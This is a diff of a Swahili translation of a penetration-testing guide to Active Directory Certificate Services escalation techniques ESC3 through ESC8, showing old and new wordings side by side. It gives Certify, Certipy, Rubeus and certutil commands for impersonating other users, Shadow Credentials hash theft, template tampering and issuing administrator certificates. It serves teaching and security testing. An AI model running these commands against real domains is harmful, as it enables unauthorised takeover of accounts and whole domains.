* Msimbo wa usalama wa templeti ya cheti ni wa kupitisha sana, ukitoa haki za usajili kwa watumiaji walio na mamlaka ndogo.
|
||||
* Templeti ya cheti inajumuisha EKU ya Mwombaji wa Cheti, ikiruhusu ombi la templeti zingine za cheti kwa niaba ya mawakala wengine.
|
||||
|
||||
**Mahitaji 2:**
|
||||
|
||||
* Enterprise CA inatoa haki za usajili kwa watumiaji wenye mamlaka ya chini.
|
||||
* CA ya Kampuni inatoa haki za usajili kwa watumiaji walio na mamlaka ndogo.
|
||||
* Idhini ya meneja inapuuzwa.
|
||||
* Toleo la mpangilio wa templeti ni 1 au linazidi 2, na linabainisha Mahitaji ya Kutolewa kwa Sera ya Maombi inayohitaji EKU ya Mwombaji wa Cheti.
|
||||
* EKU iliyoelezwa katika templeti ya cheti inaruhusu uwakilishi wa uwanja.
|
||||
* Vizuizi kwa mawakala wa usajili havijatekelezwa kwenye CA.
|
||||
|
||||
### Matumizi
|
||||
|
||||
Unaweza kutumia [**Certify**](https://github.com/GhostPack/Certify) au [**Certipy**](https://github.com/ly4k/Certipy) kuchukua faida ya hali hii:
|
||||
* Vizuizi kwa mawakala wa usajili havijatumiki kwenye CA.
|
||||
```bash
|
||||
# Request an enrollment agent certificate
|
||||
Certify.exe request /ca:DC01.DOMAIN.LOCAL\DOMAIN-CA /template:Vuln-EnrollmentAgent
|
||||
|
@ -130,25 +130,25 @@ certipy req -username john@corp.local -password Pass0rd! -target-ip ca.corp.loca
|
|||
# Use Rubeus with the certificate to authenticate as the other user
|
||||
Rubeu.exe asktgt /user:CORP\itadmin /certificate:itadminenrollment.pfx /password:asdf
|
||||
```
|
||||
**Watumiaji** ambao wanaruhusiwa **kupata** cheti cha **mawakala wa usajili**, templeti ambazo mawakala wa usajili wanaruhusiwa kusajili, na **akaunti** kwa niaba ya ambayo mawakala wa usajili wanaweza kutenda zinaweza kudhibitiwa na CA za kampuni. Hii inafikiwa kwa kufungua `certsrc.msc` **snap-in**, **bonyeza kulia kwenye CA**, **bonyeza Mipangilio**, na kisha **navigating** kwenye kichupo cha "Mawakala wa Usajili".
|
||||
**Watumiaji** ambao wanaruhusiwa **kupata** cheti cha **mawakala wa usajili**, templeti ambazo mawakala wa usajili wanaruhusiwa kusajili, na **akaunti** kwa niaba ya ambayo mawakala wa usajili wanaweza kutenda zinaweza kudhibitiwa na CA za kampuni. Hii inafanikishwa kwa kufungua `certsrc.msc` **snap-in**, **bonyeza kulia kwenye CA**, **bonyeza Mali**, na kisha **navigating** kwenye kichupo cha "Mawakala wa Usajili".
|
||||
|
||||
Walakini, inasisitizwa kuwa mipangilio ya **msingi** kwa CA ni "Kutofunga mawakala wa usajili." Wakati kizuizi kwenye mawakala wa usajili kinaamilishwa na wasimamizi, kukiweka kuwa "Funga mawakala wa usajili," usanidi wa msingi bado ni wa kipekee sana. Inaruhusu **Kila mtu** kupata kusajili kwenye templeti zote kama yeyote.
|
||||
Walakini, inasisitizwa kuwa mipangilio ya **msingi** kwa CA ni "**Usizuie mawakala wa usajili**." Wakati kizuizi kwenye mawakala wa usajili kinaamilishwa na wasimamizi, kukiweka kuwa "Zuia mawakala wa usajili," usanidi wa msingi unabaki kuwa wa kipekee sana. Inaruhusu **Kila mtu** kupata usajili kwenye templeti zote kama yeyote.
|
||||
|
||||
## Udhibiti wa Upatikanaji wa Templeti ya Cheti Inayoweza Kudhurika - ESC4
|
||||
|
||||
### **Maelezo**
|
||||
|
||||
**Maelezo ya usalama** kwenye **templeti za cheti** inaamua **ruhusa** maalum ambazo **misingi ya AD** inamiliki kuhusu templeti.
|
||||
**Maelezo ya usalama** kwenye **templeti za cheti** inadefini **ruhusa** maalum ambazo **mabwana wa AD** wanamiliki kuhusu templeti.
|
||||
|
||||
Ikiwa **mshambuliaji** ana **ruhusa** zinazohitajika za **kubadilisha** **templeti** na **kuweka** **mikokoteni inayoweza kudhurika** iliyoelezwa katika **sehemu zilizotangulia**, upandishaji wa hadhi unaweza kurahisishwa.
|
||||
Ikiwa **mshambuliaji** anamiliki **ruhusa** zinazohitajika za **kubadilisha** **templeti** na **kuweka** **mikorosho inayoweza kudhurika** iliyoelezwa katika **sehemu zilizotangulia**, upandishaji wa hadhi unaweza kurahisishwa.
|
||||
|
||||
Ruhusa muhimu zinazoweza kutumika kwa templeti za cheti ni pamoja na:
|
||||
|
||||
* **Mmiliki:** Hutoa udhibiti wa moja kwa moja juu ya kitu, kuruhusu kubadilisha sifa yoyote.
|
||||
* **KudhibitiKamili:** Inawezesha mamlaka kamili juu ya kitu, ikiwa ni pamoja na uwezo wa kubadilisha sifa yoyote.
|
||||
* **AndikaMmiliki:** Inaruhusu kubadilisha mmiliki wa kitu kuwa misingi chini ya udhibiti wa mshambuliaji.
|
||||
* **AndikaMmiliki:** Inaruhusu kubadilisha mmiliki wa kitu kuwa mkuu chini ya udhibiti wa mshambuliaji.
|
||||
* **AndikaDacl:** Inaruhusu marekebisho ya udhibiti wa upatikanaji, ikiruhusu mshambuliaji KudhibitiKamili.
|
||||
* **AndikaMali:** Inaidhinisha kuhariri mali yoyote ya kitu.
|
||||
* **AndikaMali:** Inaidhinisha uhariri wa mali yoyote ya kitu.
|
||||
|
||||
### Mabaya
|
||||
|
||||
|
@ -156,13 +156,13 @@ Mfano wa privesc kama ule uliotangulia:
|
|||
|
||||
<figure><img src="../../../.gitbook/assets/image (811).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
ESC4 ni wakati mtumiaji ana ruhusa za andika juu ya templeti ya cheti. Hii inaweza kutumiwa, kwa mfano, kubadilisha usanidi wa templeti ya cheti ili kufanya templeti iweze kudhurika kwa ESC1.
|
||||
ESC4 ni wakati mtumiaji ana ruhusa za andika juu ya templeti ya cheti. Hii inaweza kwa mfano kutumika kubadilisha usanidi wa templeti ya cheti ili kufanya templeti iweze kudhurika kwa ESC1.
|
||||
|
||||
Kama tunavyoona kwenye njia hapo juu, tu `JOHNPC` ana ruhusa hizi, lakini mtumiaji wetu `JOHN` ana pembe mpya ya `AddKeyCredentialLink` kwa `JOHNPC`. Kwa kuwa mbinu hii inahusiana na vyeti, nimefanya shambulio hili pia, linalojulikana kama [Shadow Credentials](https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab). Hapa kuna kidokezo kidogo cha amri ya `shadow auto` ya Certipy kupata NT hash ya mhanga.
|
||||
Kama tunavyoona kwenye njia hapo juu, tu `JOHNPC` ana ruhusa hizi, lakini mtumiaji wetu `JOHN` ana kona mpya ya `AddKeyCredentialLink` kwa `JOHNPC`. Kwa kuwa mbinu hii inahusiana na vyeti, nimeitekeleza shambulio hili pia, ambalo linajulikana kama [Shadow Credentials](https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab). Hapa kuna kidokezo kidogo cha amri ya `shadow auto` ya Certipy kupata NT hash ya mhanga.
|
||||
```bash
|
||||
certipy shadow auto 'corp.local/john:Passw0rd!@dc.corp.local' -account 'johnpc'
|
||||
```
|
||||
**Certipy** inaweza kubadilisha usanidi wa kiolesura cha cheti kwa amri moja. Kwa **chaguo-msingi**, Certipy itabadilisha usanidi ili kuifanya iwe **dhaifu kwa ESC1**. Tunaweza pia kutaja **`-save-old` parameter kuokoa usanidi wa zamani**, ambao utakuwa na manufaa kwa **kurejesha** usanidi baada ya shambulio letu.
|
||||
**Certipy** inaweza kubadilisha usanidi wa kiolezo cha cheti kwa amri moja. Kwa **chaguo-msingi**, Certipy itabadilisha usanidi ili kuifanya iwe **inayoweza kushambuliwa na ESC1**. Tunaweza pia kutaja **`-save-old` parameter** ili kuokoa usanidi wa zamani, ambao utakuwa muhimu kwa **kurejesha** usanidi baada ya shambulio letu.
|
||||
```bash
|
||||
# Make template vuln to ESC1
|
||||
certipy template -username john@corp.local -password Passw0rd -template ESC4-Test -save-old
|
||||
|
@ -173,15 +173,15 @@ certipy req -username john@corp.local -password Passw0rd -ca corp-DC-CA -target
|
|||
# Restore config
|
||||
certipy template -username john@corp.local -password Passw0rd -template ESC4-Test -configuration ESC4-Test.json
|
||||
```
|
||||
## Kudhibiti Upatikanaji wa Vitu Dhaifu vya PKI - ESC5
|
||||
## Kudhibiti Upatikanaji wa Vitu Hatarishi vya PKI - ESC5
|
||||
|
||||
### Maelezo
|
||||
|
||||
Mtandao mpana wa mahusiano uliounganishwa na ACL, ambao unajumuisha vitu kadhaa zaidi ya templeti za vyeti na mamlaka ya vyeti, unaweza kuathiri usalama wa mfumo mzima wa AD CS. Vitu hivi, ambavyo vinaweza kuathiri usalama kwa kiasi kikubwa, ni pamoja na:
|
||||
Mtandao mpana wa mahusiano uliounganishwa na ACL, ambao unajumuisha vitu kadhaa zaidi ya templeti za vyeti na mamlaka ya vyeti, unaweza kuathiri usalama wa mfumo mzima wa AD CS. Vitu hivi, vinavyoweza kuathiri usalama kwa kiasi kikubwa, ni pamoja na:
|
||||
|
||||
* Kielezo cha kompyuta ya AD ya seva ya CA, ambayo inaweza kudukuliwa kupitia mbinu kama S4U2Self au S4U2Proxy.
|
||||
* Kielelezo cha kompyuta ya AD ya seva ya CA, ambayo inaweza kudukuliwa kupitia mbinu kama S4U2Self au S4U2Proxy.
|
||||
* Seva ya RPC/DCOM ya seva ya CA.
|
||||
* Kielezo chochote cha AD au chombo kilichopo ndani ya njia maalum ya chombo `CN=Public Key Services,CN=Services,CN=Configuration,DC=<DOMAIN>,DC=<COM>`. Njia hii inajumuisha, lakini sio tu, vyombo na vitu kama chombo cha Templeti za Vyeti, chombo cha Mamlaka ya Uthibitishaji, kielezo cha NTAuthCertificates, na chombo cha Huduma za Usajili.
|
||||
* Kielelezo chochote cha AD au chombo ndani ya njia maalum ya chombo `CN=Public Key Services,CN=Services,CN=Configuration,DC=<DOMAIN>,DC=<COM>`. Njia hii inajumuisha, lakini sio tu, vyombo na vitu kama chombo cha Templeti za Vyeti, chombo cha Mamlaka ya Uthibitishaji, kielelezo cha NTAuthCertificates, na chombo cha Huduma za Usajili.
|
||||
|
||||
Usalama wa mfumo wa PKI unaweza kudhoofishwa ikiwa mshambuliaji mwenye mamlaka ya chini anafanikiwa kupata udhibiti juu ya mojawapo ya vipengele muhimu hivi.
|
||||
|
||||
|
@ -189,9 +189,9 @@ Usalama wa mfumo wa PKI unaweza kudhoofishwa ikiwa mshambuliaji mwenye mamlaka y
|
|||
|
||||
### Maelezo
|
||||
|
||||
Mada iliyozungumziwa katika [**chapisho la CQure Academy**](https://cqureacademy.com/blog/enhanced-key-usage) pia inagusa **`EDITF_ATTRIBUTESUBJECTALTNAME2`** na matokeo yake, kama ilivyoelezwa na Microsoft. Mpangilio huu, unapowashwa kwenye Mamlaka ya Uthibitishaji (CA), inaruhusu kuingizwa kwa **thamani zilizoundwa na mtumiaji** katika **jina mbadala la mada** kwa **ombi lolote**, ikiwa ni pamoja na lile lililoundwa kutoka kwa Active Directory®. Kwa hivyo, utoaji huu unaruhusu **muingiliaji** kujiandikisha kupitia **templeti yoyote** iliyowekwa kwa ajili ya **uthibitishaji wa uwanja**—hasa zile zinazowezesha usajili wa watumiaji wasio na **mamlaka**, kama vile templeti ya Mtumiaji ya kawaida. Kama matokeo, cheti linaweza kusimbwa, kuruhusu muingiliaji kujithibitisha kama msimamizi wa uwanja au **kifaa kingine chochote kilicho hai** ndani ya uwanja.
|
||||
Mada iliyozungumziwa katika [**chapisho la CQure Academy**](https://cqureacademy.com/blog/enhanced-key-usage) pia inagusa **`EDITF_ATTRIBUTESUBJECTALTNAME2`** na matokeo yake, kama ilivyoelezwa na Microsoft. Mpangilio huu, unapowashwa kwenye Mamlaka ya Uthibitishaji (CA), inaruhusu kuingizwa kwa **thamani zilizoundwa na mtumiaji** kwenye **jina mbadala la mada** kwa **ombi lolote**, ikiwa ni pamoja na lile lililoundwa kutoka kwa Active Directory®. Kwa hivyo, utoaji huu unaruhusu **mshambuliaji** kujiandikisha kupitia **templeti yoyote** iliyowekwa kwa ajili ya **uthibitishaji wa uwanja**—hasa zile zinazowezesha usajili wa watumiaji **wasio na mamlaka**, kama vile templeti ya Mtumiaji ya kawaida. Kama matokeo, cheti linaweza kusimbwa, kuruhusu mshambuliaji kujithibitisha kama msimamizi wa uwanja au **kifaa kingine chochote kilicho hai** ndani ya uwanja.
|
||||
|
||||
**Maelezo**: Mbinu ya kuongeza **majina mbadala** kwenye Ombi la Kusaini Cheti (CSR), kupitia hoja ya `-attrib "SAN:"` katika `certreq.exe` (inayojulikana kama "Name Value Pairs"), inaleta **tofauti** kutoka kwa mkakati wa kutumia SANs katika ESC1. Hapa, tofauti iko katika **jinsi habari ya akaunti inavyofungwa**—ndani ya sifa ya cheti, badala ya kipengee.
|
||||
**Maelezo**: Mbinu ya kuongeza **majina mbadala** kwenye Ombi la Kusaini Cheti (CSR), kupitia hoja ya `-attrib "SAN:"` katika `certreq.exe` (inayojulikana kama "Name Value Pairs"), inaleta **tofauti** kutoka kwa mkakati wa kutumia SANs katika ESC1. Hapa, tofauti iko katika **jinsi habari ya akaunti inavyofungwa**—ndani ya sifa ya cheti, badala ya kipanuzi.
|
||||
|
||||
### Mabaya
|
||||
|
||||
|
@ -212,7 +212,7 @@ Certify.exe find
|
|||
Certify.exe request /ca:dc.domain.local\theshire-DC-CA /template:User /altname:localadmin
|
||||
certipy req -username john@corp.local -password Passw0rd -ca corp-DC-CA -target ca.corp.local -template User -upn administrator@corp.local
|
||||
```
|
||||
Kubadilisha mipangilio hii, ikiaminika kuwa mtu ana **haki za utawala wa kikoa** au sawa nayo, amri ifuatayo inaweza kutekelezwa kutoka kwa kituo chochote cha kazi:
|
||||
Kubadilisha mipangilio hii, ikiaminika kuwa mtu ana **haki za utawala wa kikoa** au sawa nayo, amri ifuatayo inaweza kutekelezwa kutoka kwenye kituo cha kazi chochote:
|
||||
```bash
|
||||
certutil -config "CA_HOST\CA_NAME" -setreg policy\EditFlags +EDITF_ATTRIBUTESUBJECTALTNAME2
|
||||
```
|
||||
|
@ -231,7 +231,7 @@ Ili kutumia ESC6, ni muhimu kwa mfumo kuwa na udhaifu wa ESC10 (Vipimo Dhaifu vy
|
|||
|
||||
#### Maelezo
|
||||
|
||||
Udhibiti wa upatikanaji kwa mamlaka ya cheti unadumishwa kupitia seti ya ruhusa zinazosimamia hatua za CA. Ruhusa hizi zinaweza kuonekana kwa kupitia `certsrv.msc`, kubonyeza kulia CA, kuchagua mali, na kisha kutembea kwenye kichupo cha Usalama. Aidha, ruhusa zinaweza kuhesabiwa kwa kutumia moduli ya PSPKI kwa amri kama vile:
|
||||
Udhibiti wa upatikanaji kwa mamlaka ya cheti unadumishwa kupitia seti ya ruhusa zinazosimamia hatua za CA. Ruhusa hizi zinaweza kuonekana kwa kupitia `certsrv.msc`, kubonyeza kulia CA, kuchagua mali, kisha kutembea kwenye kichupo cha Usalama. Aidha, ruhusa zinaweza kuhesabiwa kwa kutumia moduli ya PSPKI kwa amri kama vile:
|
||||
```bash
|
||||
Get-CertificationAuthority -ComputerName dc.domain.local | Get-CertificationAuthorityAcl | select -expand Access
|
||||
```
|
||||
|
@ -239,13 +239,13 @@ Hii hutoa ufahamu kuhusu haki kuu, yaani **`ManageCA`** na **`ManageCertificates
|
|||
|
||||
#### Mabaya
|
||||
|
||||
Kuwa na haki za **`ManageCA`** kwenye mamlaka ya cheti inamwezesha mhusika kubadilisha mipangilio kijijini kwa kutumia PSPKI. Hii ni pamoja na kubadilisha bendera ya **`EDITF_ATTRIBUTESUBJECTALTNAME2`** kuruhusu maelezo ya SAN kwenye kigezo chochote, sehemu muhimu ya ukuaji wa uwanja.
|
||||
Kuwa na haki za **`ManageCA`** kwenye mamlaka ya cheti inamwezesha mkuu kubadilisha mipangilio kijijini kwa kutumia PSPKI. Hii ni pamoja na kubadilisha bendera ya **`EDITF_ATTRIBUTESUBJECTALTNAME2`** kuruhusu maelezo ya SAN kwenye kigezo chochote, sehemu muhimu ya ukuaji wa uwanja.
|
||||
|
||||
Kusahilisha mchakato huu kunaweza kufikiwa kupitia matumizi ya amri ya PSPKI ya **Enable-PolicyModuleFlag**, kuruhusu marekebisho bila mwingiliano wa moja kwa moja wa GUI.
|
||||
|
||||
Umiliki wa haki za **`ManageCertificates`** unawezesha idhini ya maombi yanayosubiri, ikiruhusu kuepuka kizuizi cha "idhini ya msimamizi wa cheti cha CA".
|
||||
|
||||
Mchanganyiko wa moduli za **Certify** na **PSPKI** unaweza kutumika kuomba, kuidhinisha, na kupakua cheti:
|
||||
Kombinisheni ya moduli za **Certify** na **PSPKI** inaweza kutumika kuomba, kuidhinisha, na kupakua cheti:
|
||||
```powershell
|
||||
# Request a certificate that will require an approval
|
||||
Certify.exe request /ca:dc.domain.local\theshire-DC-CA /template:ApprovalNeeded
|
||||
|
@ -266,18 +266,18 @@ Certify.exe download /ca:dc.domain.local\theshire-DC-CA /id:336
|
|||
#### Maelezo
|
||||
|
||||
{% hint style="warning" %}
|
||||
Katika **shambulizi lililopita** **`Manage CA`** ruhusa ilitumika kuwezesha bendera ya **EDITF\_ATTRIBUTESUBJECTALTNAME2** kutekeleza shambulizi la **ESC6**, lakini hii haitakuwa na athari yoyote mpaka huduma ya CA (`CertSvc`) irejeshwe. Wakati mtumiaji ana haki ya kupata `Manage CA`, mtumiaji pia ameruhusiwa **kuanzisha upya huduma**. Hata hivyo, **haimaanishi kwamba mtumiaji anaweza kuanzisha upya huduma kwa mbali**. Zaidi ya hayo, **ESC6 huenda isifanye kazi kiotomatiki** katika mazingira mengi yaliyosasishwa kutokana na sasisho za usalama za Mei 2022.
|
||||
Katika **shambulizi lililopita** **`Manage CA`** ruhusa zilitumika kuwezesha bendera ya **EDITF\_ATTRIBUTESUBJECTALTNAME2** kutekeleza shambulizi la **ESC6**, lakini hii haitakuwa na athari yoyote mpaka huduma ya CA (`CertSvc`) irejeshwe. Wakati mtumiaji ana haki ya kupata `Manage CA`, mtumiaji pia anaruhusiwa **kuanzisha upya huduma**. Walakini, **hii haimaanishi kwamba mtumiaji anaweza kuanzisha upya huduma kijijini**. Zaidi ya hayo, **ESC6 huenda isifanye kazi kwenye mazingira mengi yaliyosasishwa kutokana na sasisho za usalama za Mei 2022**.
|
||||
{% endhint %}
|
||||
|
||||
Hivyo basi, shambulizi lingine limewasilishwa hapa.
|
||||
Hivyo basi, shambulizi lingine linapendekezwa hapa.
|
||||
|
||||
Mahitaji:
|
||||
|
||||
* **Ruhsa ya `ManageCA` pekee**
|
||||
* **Ruhsa ya `Manage Certificates`** (inaweza kutolewa kutoka kwa **`ManageCA`**)
|
||||
* Ruhsa ya **`Manage Certificates`** (inaweza kutolewa kutoka kwa **`ManageCA`**)
|
||||
* Kigezo cha cheti cha **`SubCA`** lazima kiwe **kimeanzishwa** (inaweza kuwezeshwa kutoka kwa **`ManageCA`**)
|
||||
|
||||
Mbinu hii inategemea ukweli kwamba watumiaji wenye ruhusa ya `Manage CA` _na_ `Manage Certificates` wanaweza **kutoa maombi ya cheti yaliyoshindwa**. Kigezo cha cheti cha **`SubCA`** kina **udhaifu wa ESC1**, lakini **waendeshaji tu** wanaweza kujiandikisha kwenye kigezo hicho. Hivyo, **mtumiaji** anaweza **kuomba** kujiandikisha kwenye **`SubCA`** - ambayo itakataliwa - lakini **kisha kutolewa na msimamizi baadaye**.
|
||||
Mbinu hii inategemea ukweli kwamba watumiaji wenye ruhusa ya `Manage CA` _na_ `Manage Certificates` wanaweza **kutoa maombi ya cheti yaliyoshindwa**. Kigezo cha cheti cha **`SubCA`** kina **udhaifu wa ESC1**, lakini **waendeshaji tu** wanaweza kujiandikisha kwenye kigezo hicho. Hivyo basi, **mtumiaji** anaweza **kuomba** kujiandikisha kwenye **`SubCA`** - ambayo itakataliwa - lakini **kisha kutolewa na msimamizi baadaye**.
|
||||
|
||||
#### Mabaya
|
||||
|
||||
|
@ -288,7 +288,7 @@ Certipy v4.0.0 - by Oliver Lyak (ly4k)
|
|||
|
||||
[*] Successfully added officer 'John' on 'corp-DC-CA'
|
||||
```
|
||||
Kiolesha cha **`SubCA`** kinaweza **kuwezeshwa kwenye CA** kwa kutumia parameter ya `-enable-template`. Kwa chaguo-msingi, kiolesha cha `SubCA` kimezimwa.
|
||||
**`SubCA`** kiolesha kinaweza kuwezeshwa kwenye CA kwa kutumia parameter ya `-enable-template`. Kwa chaguo-msingi, kiolesha cha `SubCA` kimezimwa.
|
||||
```bash
|
||||
# List templates
|
||||
certipy ca -username john@corp.local -password Passw0rd! -target-ip ca.corp.local -ca 'corp-CA' -enable-template 'SubCA'
|
||||
|
@ -314,14 +314,14 @@ Would you like to save the private key? (y/N) y
|
|||
[*] Saved private key to 785.key
|
||||
[-] Failed to request certificate
|
||||
```
|
||||
Kwa **`Manage CA` na `Manage Certificates`** yetu, tunaweza kisha **kutoa ombi la cheti lililoshindwa** kwa amri ya `ca` na parameter `-issue-request <ombi la ID>`.
|
||||
Kwa **`Manage CA` na `Manage Certificates`** zetu, tunaweza kisha **kutoa ombi la cheti lililoshindwa** kwa kutumia amri ya `ca` na parameter `-issue-request <ombi la ID>`.
|
||||
```bash
|
||||
certipy ca -ca 'corp-DC-CA' -issue-request 785 -username john@corp.local -password Passw0rd
|
||||
Certipy v4.0.0 - by Oliver Lyak (ly4k)
|
||||
|
||||
[*] Successfully issued certificate
|
||||
```
|
||||
Na mwishowe, tunaweza **kupata cheti kilichotolewa** kwa kutumia amri ya `req` na parameter `-retrieve <ombi ID>`.
|
||||
Na mwishowe, tunaweza **kupata cheti kilichotolewa** kwa kutumia amri ya `req` na parameter `-retrieve <ombi la kitambulisho>`.
|
||||
```bash
|
||||
certipy req -username john@corp.local -password Passw0rd -ca corp-DC-CA -target ca.corp.local -retrieve 785
|
||||
Certipy v4.0.0 - by Oliver Lyak (ly4k)
|
||||
|
@ -333,28 +333,28 @@ Certipy v4.0.0 - by Oliver Lyak (ly4k)
|
|||
[*] Loaded private key from '785.key'
|
||||
[*] Saved certificate and private key to 'administrator.pfx'
|
||||
```
|
||||
## NTLM Relay to AD CS HTTP Endpoints – ESC8
|
||||
## NTLM Relay kwa Vipengele vya AD CS vya HTTP - ESC8
|
||||
|
||||
### Maelezo
|
||||
|
||||
{% hint style="info" %}
|
||||
Katika mazingira ambapo **AD CS imewekwa**, ikiwa kuna **kituo cha uendeshaji wa wavuti kilichodhoofishwa** na angalau **kiolesura cha cheti kimechapishwa** kinachoruhusu **usajili wa kompyuta za kikoa na uthibitishaji wa mteja** (kama templeti ya cheti ya msingi ya **`Machine`**), inawezekana kwa **kompyuta yoyote yenye huduma ya spooler kuathiriwa na mshambuliaji**!
|
||||
Katika mazingira ambapo **AD CS imewekwa**, ikiwa kuna **kituo cha uendeshaji wa wavuti kilichoweza kudukuliwa** na angalau **kigezo cha cheti kimechapishwa** kinachoruhusu **usajili wa kompyuta za kikoa na uthibitishaji wa mteja** (kama vile kigezo cha cheti cha msingi cha **`Machine`**), inawezekana kwa **kompyuta yoyote yenye huduma ya spooler kuwa hatarini kwa mshambuliaji**!
|
||||
{% endhint %}
|
||||
|
||||
**Mbinu kadhaa za usajili zinazotegemea HTTP** zinasaidiwa na AD CS, zinapatikana kupitia majukumu ya seva ya ziada ambayo wasimamizi wanaweza kufunga. Violesura hivi vya usajili wa cheti kwa kutumia HTTP viko hatarini kwa **mashambulizi ya NTLM relay**. Mshambuliaji, kutoka kwa **mashine iliyoathiriwa, anaweza kujifanya kuwa akaunti yoyote ya AD inayothibitisha kupitia NTLM ya kuingia**. Wakati akijifanya kuwa akaunti ya mwathiriwa, violesura hivi vya wavuti vinaweza kufikiwa na mshambuliaji kuomba cheti cha uthibitishaji wa mteja kwa kutumia templeti za cheti za **`User`** au **`Machine`**.
|
||||
**Mbinu kadhaa za usajili zinazotegemea HTTP** zinasaidiwa na AD CS, zinapatikana kupitia majukumu ya seva ya ziada ambayo wasimamizi wanaweza kufunga. Interface hizi za usajili wa cheti zinazotegemea HTTP zinaweza kushambuliwa na **mashambulizi ya NTLM relay**. Mshambuliaji, kutoka kwa **mashine iliyodukuliwa, anaweza kujifanya kuwa akaunti yoyote ya AD inayothibitisha kupitia NTLM ya kuingia**. Wakati akijifanya kuwa akaunti ya mwathirika, interface hizi za wavuti zinaweza kufikiwa na mshambuliaji kuomba cheti cha uthibitishaji wa mteja kwa kutumia kigezo cha cheti cha `User` au `Machine`.
|
||||
|
||||
* **Kiolesura cha usajili wa wavuti** (programu ya zamani ya ASP inayopatikana kwa chaguo-msingi kwa njia ya HTTP tu kwa `http://<caserver>/certsrv/`), kwa chaguo-msingi inaruhusu tu uwakilishi wa NTLM kupitia kichwa cha HTTP cha Uthibitishaji, ikifanya njia za uthibitishaji zenye usalama zaidi kama Kerberos kutotumika.
|
||||
* **Huduma ya Usajili wa Cheti** (CES), **Huduma ya Sera ya Usajili wa Cheti** (CEP) ya Wavuti, na **Huduma ya Usajili wa Kifaa cha Mtandao** (NDES) kwa chaguo-msingi hutoa uthibitishaji wa majadiliano kupitia kichwa chao cha HTTP cha Uthibitishaji. Uthibitishaji wa majadiliano **unaruhusu** Kerberos na **NTLM**, ikiruhusu mshambuliaji **kudhoofisha hadi NTLM** wakati wa mashambulizi ya relay. Ingawa huduma hizi za wavuti huwezesha HTTPS kwa chaguo-msingi, HTTPS pekee **haisaidii dhidi ya mashambulizi ya NTLM relay**. Kinga dhidi ya mashambulizi ya NTLM relay kwa huduma za HTTPS inawezekana tu wakati HTTPS inachanganywa na kufunga kwa njia. Kwa kusikitisha, AD CS haifanyi Ulinzi wa Kuongezwa kwa Uthibitishaji kwenye IIS, ambayo inahitajika kwa kufunga kwa njia.
|
||||
* **Interface ya usajili wa wavuti** (programu ya ASP ya zamani inayopatikana kwa `http://<caserver>/certsrv/`), ina mipangilio ya msingi ya HTTP tu, ambayo haitoi ulinzi dhidi ya mashambulizi ya NTLM relay. Aidha, inaruhusu tu uthibitishaji wa NTLM kupitia kichwa cha HTTP cha Uthibitishaji, ikifanya njia za uthibitishaji zaidi salama kama Kerberos kutumika.
|
||||
* **Huduma ya Usajili wa Cheti** (CES), **Sera ya Usajili wa Cheti** (CEP) Huduma ya Wavuti, na **Huduma ya Usajili wa Kifaa cha Mtandao** (NDES) kwa chaguo-msingi hushikilia uthibitishaji wa majadiliano kupitia kichwa chao cha HTTP cha Uthibitishaji. Uthibitishaji wa majadiliano **unasaidia** Kerberos na **NTLM**, kuruhusu mshambuliaji **kudhoofisha hadi NTLM** wakati wa mashambulizi ya relay. Ingawa huduma hizi za wavuti huwezesha HTTPS kwa chaguo-msingi, HTTPS pekee **haisalimishi dhidi ya mashambulizi ya NTLM relay**. Ulinzi kutoka kwa mashambulizi ya NTLM relay kwa huduma za HTTPS ni muhimu tu wakati HTTPS inachanganywa na kufunga kwa njia ya kituo. Kwa bahati mbaya, AD CS haiweki Ulinzi wa Kuongezwa kwa Uthibitishaji kwenye IIS, ambayo inahitajika kwa kufunga kwa njia ya kituo.
|
||||
|
||||
**Shida** kubwa ya mashambulizi ya NTLM relay ni **muda mfupi wa vikao vya NTLM** na uwezo wa mshambuliaji kuingiliana na huduma zinazohitaji **saini ya NTLM**.
|
||||
**Shida** kuu ya mashambulizi ya NTLM relay ni **muda mfupi wa vikao vya NTLM** na uwezo wa mshambuliaji kuingiliana na huduma zinazohitaji **saini ya NTLM**.
|
||||
|
||||
Walakini, kikwazo hiki kinaondolewa kwa kudhoofisha mashambulizi ya NTLM relay ili kupata cheti kwa mtumiaji, kwani muda wa halali wa cheti unadhibiti muda wa kikao, na cheti kinaweza kutumika na huduma zinazohitaji **saini ya NTLM**. Kwa maelekezo juu ya kutumia cheti lililorushwa, tazama:
|
||||
Walakini, kikwazo hiki kinaweza kushindwa kwa kudukua mashambulizi ya NTLM relay ili kupata cheti kwa mtumiaji, kwani muda wa halali wa cheti unadhibiti muda wa kikao, na cheti kinaweza kutumika na huduma zinazohitaji **saini ya NTLM**. Kwa maelekezo ya kutumia cheti lililorushwa, tazama:
|
||||
|
||||
{% content-ref url="account-persistence.md" %}
|
||||
[account-persistence.md](account-persistence.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
Kikwazo kingine cha mashambulizi ya NTLM relay ni kwamba **mashine inayodhibitiwa na mshambuliaji lazima ithibitishwe na akaunti ya mwathiriwa**. Mshambuliaji anaweza kusubiri au kujaribu **kulazimisha** uthibitisho huu:
|
||||
Kikwazo kingine cha mashambulizi ya NTLM relay ni kwamba **mashine inayodhibitiwa na mshambuliaji lazima ithibitishwe na akaunti ya mwathirika**. Mshambuliaji anaweza kusubiri au kujaribu **kulazimisha** uthibitisho huu:
|
||||
|
||||
{% content-ref url="../printers-spooler-service-abuse.md" %}
|
||||
[printers-spooler-service-abuse.md](../printers-spooler-service-abuse.md)
|
||||
|
@ -362,13 +362,13 @@ Kikwazo kingine cha mashambulizi ya NTLM relay ni kwamba **mashine inayodhibitiw
|
|||
|
||||
### **Matumizi**
|
||||
|
||||
[**Certify**](https://github.com/GhostPack/Certify)’s `cas` inahesabu **vichupo vya HTTP vya AD CS vilivyoruhusiwa**:
|
||||
[**Certify**](https://github.com/GhostPack/Certify)’s `cas` inachunguza **vipengele vya HTTP vya AD CS vilivyoruhusiwa**:
|
||||
```
|
||||
Certify.exe cas
|
||||
```
|
||||
<figure><img src="../../../.gitbook/assets/image (69).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
Mali ya `msPKI-Enrollment-Servers` hutumiwa na Mamlaka za Cheti za kampuni (CAs) kuhifadhi miisho ya Huduma ya Usajili wa Cheti (CES). Miisho hii inaweza kuchambuliwa na kuorodheshwa kwa kutumia zana **Certutil.exe**:
|
||||
